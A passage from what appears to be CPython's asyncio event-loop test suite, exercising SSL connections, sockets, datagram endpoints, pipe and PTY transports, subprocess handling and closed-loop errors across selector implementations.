self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
@unittest.skipIf(sys.platform == 'darwin', 'test hangs on MacOS')
# Issue #20495: The test hangs on FreeBSD 7.2 but pass on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2, loop=loop)
await asyncio.sleep(1e-4, loop=loop)
await asyncio.sleep(1e-6, loop=loop)
await asyncio.sleep(1e-8, loop=loop)
await asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
